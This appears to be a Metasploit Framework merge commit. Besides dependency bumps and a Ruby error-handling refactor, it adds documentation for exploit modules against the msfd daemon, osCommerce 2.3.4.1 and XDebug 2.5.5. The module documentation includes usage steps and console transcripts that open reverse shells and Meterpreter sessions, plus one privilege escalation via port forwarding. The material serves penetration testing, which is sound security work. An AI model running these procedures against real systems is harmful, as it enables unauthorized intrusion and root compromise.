Merge branch 'master' into ms-2962
This commit is contained in:
commit
038fe03777
10
Gemfile.lock
10
Gemfile.lock
|
@ -18,9 +18,9 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.3.33)
|
||||
metasploit-payloads (= 1.3.34)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.3.7)
|
||||
metasploit_payloads-mettle (= 0.3.8)
|
||||
mqtt
|
||||
msgpack
|
||||
nessus_rest
|
||||
|
@ -121,7 +121,7 @@ GEM
|
|||
dnsruby (1.60.2)
|
||||
docile (1.3.0)
|
||||
erubis (2.7.0)
|
||||
eventmachine (1.2.5)
|
||||
eventmachine (1.2.6)
|
||||
factory_bot (4.8.2)
|
||||
activesupport (>= 3.0.0)
|
||||
factory_bot_rails (4.8.2)
|
||||
|
@ -161,7 +161,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.3.33)
|
||||
metasploit-payloads (1.3.34)
|
||||
metasploit_data_models (3.0.0)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -172,7 +172,7 @@ GEM
|
|||
postgres_ext
|
||||
railties (~> 4.2.6)
|
||||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.3.7)
|
||||
metasploit_payloads-mettle (0.3.8)
|
||||
method_source (0.9.0)
|
||||
mini_portile2 (2.3.0)
|
||||
minitest (5.11.3)
|
||||
|
|
|
@ -0,0 +1,99 @@
|
|||
## Description
|
||||
|
||||
This module connects to the Metasploit msf daemon and uses the ruby interpreter
|
||||
to achieve a shell. This module can be used when the vulnerable service is only
|
||||
listening on localhost and the attacker has not achieved a foothold on the
|
||||
machine. To achieve code execution, the data is sent from the victim's browser.
|
||||
To achieve this, the victim must visit the attacker's web site.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
|
||||
of providing remote access. The msf daemon provides no means of authentication
|
||||
and is therefore vulnerable against an attacker who has IP access to the daemon.
|
||||
In those cases where the daemon is listening on localhost, we take advantage of
|
||||
the fact that the victim's web browser has IP access to the daemon.
|
||||
|
||||
Because the msfconsole-program is line-based, it is possible to successfully
|
||||
send commands through the HTTP-protocol. This module takes advantage of this by
|
||||
placing the msfconsole-command in the POST-data of a HTTP-request. Since these
|
||||
POST-requests are considered safe to send cross-domain, it is possible to send
|
||||
them from the attacker's web application and to localhost using the victim's
|
||||
browser.
|
||||
|
||||
All versions of Metasploit are affected by this module, however testing has only
|
||||
been performed on the following targets:
|
||||
|
||||
* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
|
||||
* Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and
|
||||
Chrome)
|
||||
|
||||
***NB!*** Exploitation on Windows had a higher degree of success, when the
|
||||
quiet-flag was sent to the msf daemon. On Linux, it made no difference.
|
||||
|
||||
Source code and installers:
|
||||
|
||||
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
|
||||
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start the vulnerable service `msfd -q -f`
|
||||
2. Start `msfconsole`
|
||||
3. Do: `use exploit/multi/browser/msfd_rce_browser`
|
||||
4. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
|
||||
5. Do: `set RPORT [PORT]` (default: `55554`)
|
||||
6. Do: `set PAYLOAD [PAYLOAD]`
|
||||
7. Do: `exploit`
|
||||
8. Do: Visit the listed URL from the victim's machine
|
||||
9. You should get a shell
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
Options unique for this module is described below.
|
||||
|
||||
**REMOTE_IP**
|
||||
|
||||
IP to target when running inside the victim's browser.
|
||||
|
||||
**REMOTE_PORT**
|
||||
|
||||
Remote port the vulnerable service is running at, default is 55554.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Through the victim's browser
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/browser/msfd_rce_browser
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
|
||||
payload => ruby/shell_reverse_tcp
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
|
||||
lhost => 192.168.0.17
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443
|
||||
lport => 443
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > exploit
|
||||
[*] Exploit running as background job 0.
|
||||
|
||||
[-] Handler failed to bind to 192.168.0.17:443:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:443
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
|
||||
http://0.0.0.0:8080/J5ras6oYftFWW4
|
||||
[*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
|
||||
[*] Server started.
|
||||
```
|
||||
|
||||
Visit the web site listed in a browser on the victim's machine and you should
|
||||
get the output below.
|
||||
|
||||
```
|
||||
[*] 192.168.0.17 msfd_rce_browser - 192.168.0.17 msfd_rce_browser
|
||||
Sending HTML...
|
||||
[*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
|
||||
id
|
||||
[*] exec: id
|
||||
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
|
@ -0,0 +1,38 @@
|
|||
## Vulnerable Application
|
||||
|
||||
osCommerce version 2.3.4.1 is vulnerable to remote code execution. If the `/install/` directory was not removed, it is possible for an unauthenticated attacker to run the `install_4.php` script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Download and install [osCommerce 2.3.4.1](https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip)
|
||||
2. `use exploit/multi/http/oscommerce_installer_unauth_code_exec`
|
||||
3. `set RHOST IP`
|
||||
4. `set PAYLOAD php/meterpreter/reverse_tcp`
|
||||
5. `set LHOST IP`
|
||||
6. `exploit`
|
||||
7. **Verify** a new Meterpreter session is started
|
||||
|
||||
## Scenarios
|
||||
|
||||
### osCommerce version 2.3.4.1 on Debian
|
||||
|
||||
```
|
||||
msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
|
||||
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
|
||||
RHOST => 172.16.40.188
|
||||
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
|
||||
PAYLOAD => php/meterpreter/reverse_tcp
|
||||
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
|
||||
LHOST => 172.16.40.5
|
||||
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.40.5:4444
|
||||
[*] Sending stage (37543 bytes) to 172.16.40.188
|
||||
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : oscommerce
|
||||
OS : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
|
||||
Meterpreter : php/linux
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,106 @@
|
|||
## Description
|
||||
|
||||
This module connects to the Metasploit msf daemon and uses the ruby interpreter
|
||||
to achieve a shell. This module can target remote systems if the daemon is
|
||||
exposed on a remote interface or it can be used for privilege escalation when
|
||||
the attacker has a foothold. If used as privilege escalation, port forwarding
|
||||
must be set up.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
|
||||
of providing remote access. The msf daemon provides no means of authentication
|
||||
and is therefore vulnerable against an attacker who has IP access to the daemon.
|
||||
|
||||
All versions of Metasploit are affected by this module, however testing has only
|
||||
been performed on the following targets:
|
||||
|
||||
* Metasploit 5.0.0 on Ubuntu 16.04
|
||||
* Metasploit 4.16.51 on Windows 7
|
||||
|
||||
Source code and installers:
|
||||
|
||||
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
|
||||
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start the vulnerable service: `msfd -f -q -a 0.0.0.0`
|
||||
2. Start `msfconsole`
|
||||
3. Do: `use exploit/multi/misc/msfd_rce_remote`
|
||||
4. Do: `set RHOST [IP]`
|
||||
5. Do: `set RPORT [PORT]` (default: `55554`)
|
||||
6. Do: `set PAYLOAD [PAYLOAD]`
|
||||
7. Do: `exploit`
|
||||
8. You should get a shell
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**RHOST**
|
||||
|
||||
Remote Host
|
||||
|
||||
**RPORT**
|
||||
|
||||
Remote port the vulnerable service is running at, default is 55554.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Remote target
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/misc/msfd_rce_remote
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101
|
||||
rhost => 192.168.56.101
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp
|
||||
payload => ruby/shell_reverse_tcp
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17
|
||||
lhost => 192.168.0.17
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set lport 443
|
||||
lport => 443
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
|
||||
|
||||
[-] Handler failed to bind to 192.168.0.17:443:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:443
|
||||
[*] Command shell session 1 opened (172.17.0.2:443 -> 192.168.0.17:48152) at 2018-04-22 18:43:41 +0000
|
||||
|
||||
whoami
|
||||
robin
|
||||
```
|
||||
|
||||
|
||||
### Local target - privilege escalation
|
||||
|
||||
```
|
||||
meterpreter > getuid
|
||||
Server username: uid=1000, gid=1000, euid=1000, egid=1000
|
||||
meterpreter > shell
|
||||
Process 17366 created.
|
||||
Channel 1 created.
|
||||
netstat -lntup|grep 55554
|
||||
(Not all processes could be identified, non-owned process info
|
||||
will not be shown, you would have to be root to see it all.)
|
||||
tcp 0 0 127.0.0.1:55554 0.0.0.0:* LISTEN -
|
||||
ps aux | grep msfd
|
||||
root 17303 3.3 13.8 535168 283492 pts/18 Sl+ 20:47 0:08 ruby ./msfd -f -q
|
||||
^C
|
||||
Terminate channel 1? [y/N] y
|
||||
meterpreter > portfwd add -l 55554 -p 55554 -r 127.0.0.1
|
||||
[*] Local TCP relay created: :55554 <-> 127.0.0.1:55554
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 2...
|
||||
msf5 > use exploit/multi/misc/msfd_rce_remote
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1
|
||||
rhost => 127.0.0.1
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
|
||||
|
||||
[-] Handler failed to bind to 192.168.0.17:443:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:443
|
||||
[*] Command shell session 3 opened (172.17.0.2:443 -> 192.168.0.17:48300) at 2018-04-22 18:55:19 +0000
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
|
@ -0,0 +1,127 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[Xdebug](https://xdebug.org/docs-dbgp.php) is an actively-maintained PHP debugging tool that supports remote debugging of server-side PHP code
|
||||
|
||||
This module exploits an unauthenticated vulnerability that allows for the upload of a PHP file and subsequent execution to provide a Meterpreter session back. The module was tested on XDebug version 2.5.5
|
||||
|
||||
The vulnerability was discovered by [Ricter Zheng](https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface) (WARNING: This link is in Chinese. [Google Translate version](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fricterz.me%2Fposts%2FXdebug%3A%20A%20Tiny%20Attack%20Surface))
|
||||
|
||||
|
||||
### Setting up XDebug 2.5.5 on xUbuntu 16.04 x64 Desktop
|
||||
|
||||
Start with a LAMP server:
|
||||
|
||||
```
|
||||
sudo apt update && sudo apt install -y tasksel
|
||||
sudo tasksel install lamp-server
|
||||
```
|
||||
|
||||
Now grab XDebug, specifically the version cited by @MinatoTW:
|
||||
```
|
||||
wget https://xdebug.org/files/xdebug-2.5.5.tgz
|
||||
tar xvzf xdebug-2.5.5.tgz
|
||||
cd xdebug-2.5.5/
|
||||
php -i
|
||||
```
|
||||
|
||||
Paste the contents of your `php -i` output into [the XDebug installation wizard](https://xdebug.org/wizard.php), which gave me the following:
|
||||
|
||||
```
|
||||
sudo apt install -y php7.0-dev
|
||||
phpize && ./configure && make
|
||||
sudo cp modules/xdebug.so /usr/lib/php/20151012/
|
||||
```
|
||||
|
||||
The final step of the wizard is to configure `php.ini`:
|
||||
|
||||
```
|
||||
sudo -s
|
||||
cat >> /etc/php/7.0/cli/php.ini <<EOL
|
||||
zend_extension = /usr/lib/php/20151012/xdebug.so
|
||||
xdebug.remote_enable = 1
|
||||
xdebug.remote_handler = dbgp
|
||||
xdebug.remote_autostart = 0
|
||||
xdebug.remote_connect_back = 1
|
||||
xdebug.remote_port = 9000
|
||||
xdebug.remote_host = 127.0.0.1
|
||||
xdebug.profiler_enable=0
|
||||
xdebug.profiler_enable_trigger=1
|
||||
xdebug.profiler_output_dir="/tmp"`
|
||||
EOL
|
||||
exit
|
||||
```
|
||||
|
||||
Now that the PHP CLI environment is configured, repeat the above steps for the Apache2 configuration:
|
||||
|
||||
```
|
||||
sudo -s
|
||||
cat >> /etc/php/7.0/cli/php.ini <<EOL
|
||||
zend_extension = /usr/lib/php/20151012/xdebug.so
|
||||
xdebug.remote_enable = 1
|
||||
xdebug.remote_handler = dbgp
|
||||
xdebug.remote_autostart = 0
|
||||
xdebug.remote_connect_back = 1
|
||||
xdebug.remote_port = 9000
|
||||
xdebug.remote_host = 127.0.0.1
|
||||
xdebug.profiler_enable=0
|
||||
xdebug.profiler_enable_trigger=1
|
||||
xdebug.profiler_output_dir="/tmp"`
|
||||
EOL
|
||||
exit
|
||||
```
|
||||
|
||||
And restart Apache2 for good measure:
|
||||
```
|
||||
sudo service apache2 restart
|
||||
```
|
||||
|
||||
And now test that XDebug is working:
|
||||
```
|
||||
php -r 'echo xdebug_time_index();'; echo
|
||||
```
|
||||
|
||||
You should see a fairly small number, in my case `4.6014785766602E-5`, which indicates the number of seconds since the php script started, thus the incredibly small number.
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
- Start `msfconsole`
|
||||
- `use exploits/unix/http/xdebug_rce`
|
||||
- `check`
|
||||
- `set RHOST 192.168.69.2`
|
||||
- `set LHOST 192.168.69.1`
|
||||
- `set VERBOSE true` (optional)
|
||||
- `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### XDebug 2.5.5 on Ubuntu 16.04 with Apache2 2.4.18
|
||||
|
||||
msf5 exploit(unix/http/xdebug_unauth_exec) > check
|
||||
|
||||
[*] 192.168.69.2:80 - Request sent
|
||||
Date: Fri, 27 Apr 2018 21:00:37 GMT
|
||||
Server: Apache/2.4.18 (Ubuntu)
|
||||
Set-Cookie: XDEBUG_SESSION=WIO6hf4Wez; expires=Fri, 27-Apr-2018 22:00:37 GMT; Max-Age=3600; path=/
|
||||
Content-Length: 16
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
|
||||
[+] 192.168.69.2:80 - Looks like remote server has xdebug enabled
|
||||
|
||||
[*] 192.168.69.2:80 The target service is running, but could not be validated.
|
||||
|
||||
|
||||
msf5 exploit(unix/http/xdebug_unauth_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.69.1:4444
|
||||
[*] 192.168.69.2:80 - Waiting for client response.
|
||||
[*] 192.168.69.2:80 - Receiving response
|
||||
508<?xml version="1.0" encoding="iso-8859-1"?>
|
||||
<init xmlns="urn:debugger_protocol_v1" xmlns:xdebug="http://xdebug.org/dbgp/xdebug" fileuri="file:///var/www/html/index.php" language="PHP" xdebug:language_version="7.0.28-0ubuntu0.16.04.1" protocol_version="1.0" appid="28166" idekey="5Gg6S9au8B"><engine version="2.5.5"><![CDATA[Xdebug]]></engine><author><![CDATA[Derick Rethans]]></author><url><![CDATA[http://xdebug.org]]></url><copyright><![CDATA[Copyright (c) 2002-2017 by Derick Rethans]]></copyright></init>
|
||||
[*] 192.168.69.2:80 - Shell might take upto a minute to respond.Please be patient.
|
||||
[*] 192.168.69.2:80 - Sending payload of size 2098 bytes
|
||||
[*] Sending stage (37775 bytes) to 192.168.69.2
|
||||
[*] Meterpreter session 1 opened (192.168.69.1:4444 -> 192.168.69.2:55506) at 2018-04-27 15:57:58 -0500
|
||||
[+] 192.168.69.2:80 - Deleted /tmp/OLEaK
|
||||
|
|
@ -4,7 +4,7 @@ module CredentialDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.create_credential(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem creating credential")
|
||||
end
|
||||
end
|
||||
|
@ -14,7 +14,7 @@ module CredentialDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.creds(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving credentials")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -8,7 +8,7 @@ module DbExportDataProxy
|
|||
}
|
||||
add_opts_workspace(opts)
|
||||
data_service.run_db_export(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem generating DB Export")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module EventDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_event(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting event")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -4,7 +4,7 @@ module ExploitDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.report_exploit_attempt(host, opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting exploit attempt")
|
||||
end
|
||||
end
|
||||
|
@ -14,7 +14,7 @@ module ExploitDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_exploit_failure(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting exploit failure")
|
||||
end
|
||||
end
|
||||
|
@ -24,7 +24,7 @@ module ExploitDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_exploit_success(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting exploit success")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -9,7 +9,7 @@ module HostDataProxy
|
|||
opts[:address] = addresses
|
||||
opts[:search_term] = search_term
|
||||
data_service.hosts(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving hosts")
|
||||
end
|
||||
end
|
||||
|
@ -37,7 +37,7 @@ module HostDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_host(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting host")
|
||||
end
|
||||
end
|
||||
|
@ -47,7 +47,7 @@ module HostDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(hosts)
|
||||
data_service.report_hosts(hosts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting hosts")
|
||||
end
|
||||
end
|
||||
|
@ -56,7 +56,7 @@ module HostDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_host(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating host")
|
||||
end
|
||||
end
|
||||
|
@ -65,7 +65,7 @@ module HostDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_host(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem deleting host")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -8,7 +8,7 @@ module LootDataProxy
|
|||
end
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_loot(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting loot")
|
||||
end
|
||||
end
|
||||
|
@ -24,7 +24,7 @@ module LootDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts, wspace)
|
||||
data_service.loot(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving loot")
|
||||
end
|
||||
end
|
||||
|
@ -35,7 +35,7 @@ module LootDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_loot(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating loot")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module NmapDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(args)
|
||||
data_service.import_nmap_xml_file(args)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem importing Nmap XML file")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module NoteDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.notes(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving notes")
|
||||
end
|
||||
end
|
||||
|
@ -20,7 +20,7 @@ module NoteDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_note(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting note")
|
||||
end
|
||||
end
|
||||
|
@ -29,7 +29,7 @@ module NoteDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_note(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating note")
|
||||
end
|
||||
end
|
||||
|
@ -38,7 +38,7 @@ module NoteDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_note(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem deleting note")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module ServiceDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts, wspace)
|
||||
data_service.services(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, 'Problem retrieving services')
|
||||
end
|
||||
end
|
||||
|
@ -19,7 +19,7 @@ module ServiceDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_service(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, 'Problem reporting service')
|
||||
end
|
||||
end
|
||||
|
@ -28,7 +28,7 @@ module ServiceDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_service(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, 'Problem updating service')
|
||||
end
|
||||
end
|
||||
|
@ -37,7 +37,7 @@ module ServiceDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_service(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, 'Problem deleting service')
|
||||
end
|
||||
end
|
||||
|
|
|
@ -3,7 +3,7 @@ module SessionDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.report_session(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting session")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -4,7 +4,7 @@ module SessionEventDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.report_session_event(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting session event")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -4,7 +4,7 @@ module VulnAttemptDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.vuln_attempts(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving vulnerability attempts")
|
||||
end
|
||||
end
|
||||
|
@ -14,7 +14,7 @@ module VulnAttemptDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_vuln_attempt(vuln, opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting vulnerability attempts")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -6,7 +6,7 @@ module VulnDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.vulns(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving vulns")
|
||||
end
|
||||
end
|
||||
|
@ -16,7 +16,7 @@ module VulnDataProxy
|
|||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.report_vuln(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting vuln")
|
||||
end
|
||||
end
|
||||
|
@ -25,7 +25,7 @@ module VulnDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_vuln(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating vuln")
|
||||
end
|
||||
end
|
||||
|
@ -34,7 +34,7 @@ module VulnDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_vuln(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem deleting vuln")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -3,7 +3,7 @@ module WebDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service.report_web_site(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem reporting website")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -5,7 +5,7 @@ module WorkspaceDataProxy
|
|||
data_service = self.get_data_service
|
||||
opts = { name: workspace_name }
|
||||
data_service.workspaces(opts).first
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem finding workspace")
|
||||
end
|
||||
end
|
||||
|
@ -15,7 +15,7 @@ module WorkspaceDataProxy
|
|||
data_service = self.get_data_service
|
||||
opts = { name: workspace_name }
|
||||
data_service.add_workspace(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem adding workspace")
|
||||
end
|
||||
end
|
||||
|
@ -27,7 +27,7 @@ module WorkspaceDataProxy
|
|||
ws = add_workspace(Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME)
|
||||
end
|
||||
ws
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem finding default workspace")
|
||||
end
|
||||
end
|
||||
|
@ -42,7 +42,7 @@ module WorkspaceDataProxy
|
|||
warn "@current_workspace was not set. Setting to default_workspace: #{default_workspace.name}"
|
||||
@current_workspace = default_workspace
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving workspace")
|
||||
end
|
||||
end
|
||||
|
@ -51,7 +51,7 @@ module WorkspaceDataProxy
|
|||
def workspace=(workspace)
|
||||
begin
|
||||
@current_workspace = workspace
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem setting workspace")
|
||||
end
|
||||
end
|
||||
|
@ -60,7 +60,7 @@ module WorkspaceDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.workspaces(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem retrieving workspaces")
|
||||
end
|
||||
end
|
||||
|
@ -69,7 +69,7 @@ module WorkspaceDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.delete_workspaces(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem deleting workspaces")
|
||||
end
|
||||
end
|
||||
|
@ -78,7 +78,7 @@ module WorkspaceDataProxy
|
|||
begin
|
||||
data_service = self.get_data_service
|
||||
data_service.update_workspace(opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
self.log_error(e, "Problem updating workspace")
|
||||
end
|
||||
end
|
||||
|
|
|
@ -20,7 +20,7 @@ module ResponseDataHelper
|
|||
return JSON.parse(body).symbolize_keys
|
||||
end
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "Error parsing response: #{e.message}"
|
||||
e.backtrace.each { |line| elog line }
|
||||
end
|
||||
|
@ -36,7 +36,7 @@ module ResponseDataHelper
|
|||
if !body.nil? && !body.empty?
|
||||
return JSON.parse(body, object_class: OpenStruct)
|
||||
end
|
||||
rescue Exception => e
|
||||
